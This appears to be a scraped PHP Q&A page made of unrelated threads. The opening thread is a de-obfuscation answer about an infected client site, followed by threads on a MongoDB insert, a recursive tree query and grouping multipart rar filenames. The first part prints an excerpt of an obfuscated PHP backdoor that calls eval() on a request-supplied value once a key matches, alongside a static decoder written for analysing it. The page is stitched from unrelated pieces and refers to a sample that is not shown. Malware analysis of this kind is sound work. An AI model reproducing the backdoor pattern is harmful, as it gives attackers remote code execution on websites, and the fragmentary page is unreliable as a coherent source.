De-obfuscation can be tough or fun, it depends on your point of view. Think of it like a puzzle. Next steps are to tidy this up, rename vars and functions to more friendly stuff, and so on.
Fixing your client's site and keeping it safe is your homework, but I look forward to a discussion around de-obfuscation and techniques to do so.
A tip: Use find . -type f -printf '%T@ %TY-%Tm-%Td %TH:%TM:%.2TS %p\n' | sort -nr | head -n 25 | cut -f2- -d" " to list the 25 latest changed files on your server. You can increase the number if you like. I guess the infected files changed on the same day, or close dates at least, so that helps to clean up the mess if you can't just wipe things clean at the moment.
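The two manual steps described in this answer (resolving the $GLOBALS['efaa04'][N] concatenations, then substituting the aliased function names) can also be done statically, treating the sample as text and never loading it into an interpreter. This is an added example, not code from the thread; the function names foldLookups and inlineAliases are made up here, and the excerpt is copied from the sample above with line breaks added.

```php
<?php
// Added example (not from the original post). The sample is handled purely as
// a string: nothing from it is included, called or evaluated.

// Lookup table copied from the first line of the sample on this page.
$table = "\x3e\x9\x2c\x46\x67\x37\x52\x32\x7d\x53\x6c\x7b\x61\x29\x6e\x68\x4f\x3f\x40\x50\x3d\x71\x6a\x54\x30\x76\x59\x25\x2b\x73\x2d\x28\x7c\x66\x23\x65\x5d\x58\x5a\x22\x64\x33\x57\x69\x5b\x63\x26\x4b\x51\x78\x4e\x2e\x62\x35\x7e\x5c\x42\x45\x47\x31\x36\x2a\x3a\x4a\x6f\x77\x5f\x39\x21\xa\x2f\x75\x41\x79\x4d\x55\x5e\x7a\x34\x44\x48\xd\x3c\x20\x49\x60\x74\x24\x4c\x43\x27\x6d\x56\x72\x70\x6b\x38\x3b";

// Excerpt of the sample from this page; line breaks added for readability.
$sample = <<<'SAMPLE'
$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96]
    .$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]
    = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][93]
    .$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][14];
for ($v40207=0; $v40207<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12]
    .$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45]
    .$GLOBALS['efaa04'][96]]($n1f035);)
if (isset($n1f035[$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][95]])
    && $ea0d31==$n1f035[$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][95]])
eval($n1f035[$GLOBALS['efaa04'][40]]);
SAMPLE;

/** Pass 1: fold every chain of $GLOBALS['<name>'][N] lookups into one quoted literal. */
function foldLookups(string $code, string $name, string $table): string
{
    $one   = '\$GLOBALS\[\'' . preg_quote($name, '/') . '\'\]\[(\d+)\]';
    $chain = '/' . $one . '(?:\s*\.\s*' . $one . ')*/';
    $fold  = function (array $m) use ($one, $table): string {
        preg_match_all('/' . $one . '/', $m[0], $idx);
        $out = '';
        foreach ($idx[1] as $i) {
            if ((int) $i >= strlen($table)) {
                return $m[0];               // index outside the table: leave untouched
            }
            $out .= $table[(int) $i];
        }
        return var_export($out, true);      // emit as a quoted PHP string literal
    };
    return preg_replace_callback($chain, $fold, $code) ?? $code;
}

/**
 * Pass 2: collect "$GLOBALS['alias'] = 'function';" assignments and rewrite
 * "$GLOBALS['alias'](" call sites to the plain function name.
 * Returns array(rewritten code, alias map).
 */
function inlineAliases(string $code): array
{
    $assign = '/\$GLOBALS\[\'(\w+)\'\]\s*=\s*\'([A-Za-z_]\w*)\'\s*;/';
    preg_match_all($assign, $code, $hits, PREG_SET_ORDER);
    $aliases = array();
    foreach ($hits as $hit) {
        $aliases[$hit[1]] = $hit[2];
    }
    $call = '/\$GLOBALS\[\'(\w+)\'\]\s*\(/';
    $code = preg_replace_callback($call, function (array $c) use ($aliases): string {
        return isset($aliases[$c[1]]) ? $aliases[$c[1]] . '(' : $c[0];
    }, $code) ?? $code;
    return array($code, $aliases);
}

list($clean, $aliases) = inlineAliases(foldLookups($sample, 'efaa04', $table));
echo $clean, "\n\n";
print_r($aliases);
```

Because only regular expressions and string indexing touch the sample, the script can be pointed at a quarantined copy of an infected file without the eval() branch ever being reachable.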

MongoDB inserting a record not working as it should

So, I've been working on this code for some time, but I'm giving up, and reaching out for help from you guys. I've been looking at documentation for MongoDB and PHP, but I can't find anything. What I want to do is take the sample code for inserting a record:
$obj = array( "title" => "Calvin and Hobbes", "author" => "Bill Watterson" );
And re-purpose it for my project (as shown):
$obj = array( $startCol => $startRow );
The thing is that $startCol and $startRow are arrays, and it gives me a problem every time I want to run the document. Is there something ridiculously simple I'm missing here? Thanks in advance.
Chunk of code that's giving me problems:
$maxRows= count($currentarray); //Outputs 45
$maxCols= count($currentarray[0]); //Outputs 9
$currentRow=1;
$currentCol=1;
$testing = 1;
do {
while ($currentCol<$maxCols){
$startCol[] = $currentarray[0][$currentCol];
$startRow[] = $currentarray[$currentRow][$currentCol];
$currentCol++;
}
$obj = array( $startCol => $startRow );
$collection->insert($obj);
print_r ($collection);
if ($currentCol==$maxCols)
$currentCol=1;
$currentRow++;
$testing++;
//echo "<br />";
} while ($currentRow<$maxRows);
The problem I was getting was with my output statement. So my answer was fairly simple. After running print_r() on all of my variables, I found that I was in fact storing them, but I was calling them incorrectly at the end of the program.

How can i fix the output of this recursion function

function my_recurse($id,$tree=array())
{
$hols = array();
$overall = array();
$asd = $this->db->get_where('story', array('story_id'=>$id))->row_array();
if(isset($asd['story_id'])){
$preds = explode(',',$asd['story_pred']);
if($preds[0] != 0)
{
$hols[] = $preds[0];
$hols = array_merge($tree, $hols);
$this->my_recurse($preds[0],$hols);
}
}
print_r($hols);
}
Say, for example, I have this tree
story1 NULL
story2 story1
story3 story2
story4 story3
and when I enter story4 as my id in the function it always returns story3 and not story1, story2 and story3. I don't know why it reverses the output after the recursion happens. Any suggestions would be appreciated.
It's hard to say if this will be easy or possible without knowing your database structure, but you don't need recursion to find the path of a tree node to the root - you can do this with a self join. Also, you should avoid making a query in a recursive function. If you can describe your table structure I can attempt to show you how to get a result set that is the tree path in order.
The problem with your code is that it's passing the current preds up to the parent, hence the reversed tree. Instead it should be getting the preds from the parent.
This should work if I understood your requirements clearly
<?php
function my_recurse($id) {
$hols = array();
$overall = array();
$asd = getFromDB($id);
if(isset($asd['story_id'])){
$preds = explode(',',$asd['story_pred']);
if($preds[0] != 0) {
$hols[] = $preds[0];
$hols = array_merge(my_recurse($preds[0]), $hols);
} else {
return $hols;
}
print "preds of {$id} : ";
print implode(', ', $hols) . "\n";
return $hols;
}
}
function getFromDB($id) {
$data = array(1 => array('story_id'=>1, 'story_pred' => '0'),
2 => array('story_id'=>2, 'story_pred' => '1'),
3 => array('story_id'=>3, 'story_pred' => '2'),
4 => array('story_id'=>4, 'story_pred' => '3'),
);
return $data[$id];
}
my_recurse(4);
Running the script above..
$ /usr/bin/php recurse.php
preds of 2 : 1
preds of 3 : 1, 2
preds of 4 : 1, 2, 3
PS: Please add your sample input, output and expected output. It took me 15 minutes to try understanding your problem.

How to optimize an algorithm for matching multipart rar files from input in php

I'm looking for a better optimized way to find and group multipart archives from an array of filenames
I have as an input for example:
array(
books.part1.rar,
books.part3.rar,
00000114.rar,
svoy_20ostrov.rar,
svoy_20ostrov.rar,
koncert_20v_20dk_20mir.rar,
koncert_20v_20centralnom_20teatre_20kukol.rar,
LP_LIVE_PR_Tampa.part2.rar,
koncert_20v_20dk_20vami.rar,
koncert_20v_20dk_20kommuna_20chast1.rar,
books.part2.rar,
koncert_20v_20dk_20kommuna_20chast2.rar,
books.part4.rar,
recedivist.rar,
LP_LIVE_PR_Tampa.part1.rar
)
And I'm looking for the output
array(
array(
books.part1.rar
books.part2.rar
books.part3.rar
books.part4.rar ) ,
00000114.rar
svoy_20ostrov.rar
koncert_20v_20dk_20mir.rar
koncert_20v_20centralnom_20teatre_20kukol.rar
koncert_20v_20dk_20vami.rar
array(
koncert_20v_20dk_20kommuna_20chast1.rar
koncert_20v_20dk_20kommuna_20chast2.rar
)
recedivist.rar
array (
LP_LIVE_PR_Tampa.part1.rar
LP_LIVE_PR_Tampa.part2.rar
)
)
I'm using php as a programming language, by the way,
An idea was to match files like (.+).part1.rar with a regular expression; then, when found, match all the other part([0-9]+).rar files (another foreach is required that loops through the whole array) and, when found, unset() those entries and add them to the newly constructed array
I would sort the array first and then loop through it, performing the Levenshtein() function on the next entry.
$rars = array(
    'books.part1.rar',
    'books.part3.rar',
    '00000114.rar',
    'svoy_20ostrov.rar',
    'svoy_20ostrov.rar',
    'koncert_20v_20dk_20mir.rar',
    'koncert_20v_20centralnom_20teatre_20kukol.rar',
    'LP_LIVE_PR_Tampa.part2.rar',
    'koncert_20v_20dk_20vami.rar',
    'koncert_20v_20dk_20kommuna_20chast1.rar',
    'books.part2.rar',
    'koncert_20v_20dk_20kommuna_20chast2.rar',
    'books.part4.rar',
    'recedivist.rar',
    'LP_LIVE_PR_Tampa.part1.rar'
);
sort($rars);
$current = 0;
$rars_complete = array();
foreach ($rars as $i => $rar) {
    // index of the next entry, or false at the end of the list
    $next = (($i + 1) < count($rars)) ? $i + 1 : false;
    $rars_complete[$current][] = $rar;
    // names that differ by one character stay in the same group
    if ($next !== false && levenshtein($rar, $rars[$next]) == 1)
        continue;
    else
        $current++;
}
Note, this is not tested.
Why don't you just sort the array? Then all you have to do is detect when the begin of the string changes to see when a new set started.
